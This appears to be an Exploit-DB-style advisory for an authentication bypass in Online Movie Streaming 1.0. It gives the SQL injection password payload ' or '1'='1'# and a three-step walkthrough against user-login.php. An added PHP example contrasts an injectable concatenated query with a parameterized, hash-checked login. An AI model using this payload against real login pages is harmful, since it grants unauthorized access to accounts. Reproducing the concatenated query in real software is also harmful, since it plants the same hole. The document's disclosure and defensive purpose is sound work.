Vendor: Online Movie Streaming
By: Kshitiz Raj (manitorpotterk)
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: Online Movie Streaming
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10/Kali Linux
2020

Online Movie Streaming 1.0 – Authentication Bypass

An authentication bypass vulnerability exists in Online Movie Streaming 1.0. An attacker can exploit it by entering anything@mail.com as the username and ' or '1'='1'# as the password on the user-login.php page. This allows the attacker to bypass authentication and gain access to the application.

Mitigation:

The application should use strong authentication mechanisms and should not rely on client-side validation.
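
A server-side check of the kind the mitigation calls for, as an added example that is not code from the application or from the original report. It assumes the bypass comes from the login query being built by string concatenation (the report does not show the source); the users table, its columns, the function names and the in-memory SQLite database are all assumptions.

```php
<?php
// Added example; not the application's code. The users table, its columns and
// the function names are assumptions made for illustration.

// Constructed in-memory SQLite database standing in for the real user store.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)');
$db->prepare('INSERT INTO users (email, password_hash) VALUES (?, ?)')
   ->execute(['alice@example.com', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Weak pattern, built as a string only and never executed: input is spliced into
// the SQL text, so a quote in the password closes the literal and whatever
// follows is parsed as SQL instead of being compared as data.
function concatenatedQuery(string $email, string $password): string
{
    return "SELECT id FROM users WHERE email = '$email' AND password = '$password'";
}

// Hardened pattern: the e-mail is bound as a parameter, and the password never
// reaches the SQL text; it is checked in PHP against the stored hash.
function login(PDO $db, string $email, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE email = ?');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null; // same return value for unknown user and wrong password
    }
    return (int) $row['id'];
}

$reported = "' or '1'='1'#"; // password value taken from the report

// Show the SQL text the weak pattern would hand to the database.
echo concatenatedQuery('anything@mail.com', $reported), PHP_EOL;

// Run the same inputs, plus one legitimate login, through the hardened check.
$attempts = [
    ['anything@mail.com', $reported],
    ['alice@example.com', $reported],
    ['alice@example.com', 'correct horse'],
];
foreach ($attempts as [$email, $password]) {
    $id = login($db, $email, $password);
    echo $email, ' => ', $id === null ? 'rejected' : "user id $id", PHP_EOL;
}
```

Run it with the PHP command-line interpreter; it needs the pdo_sqlite extension.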

Exploit-DB raw data:

# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to URL http://localhost/onlinemovie/user-login.php
Step 2 - Enter Username: anything@mail.com
Step 3 - Enter Password: ' or '1'='1'#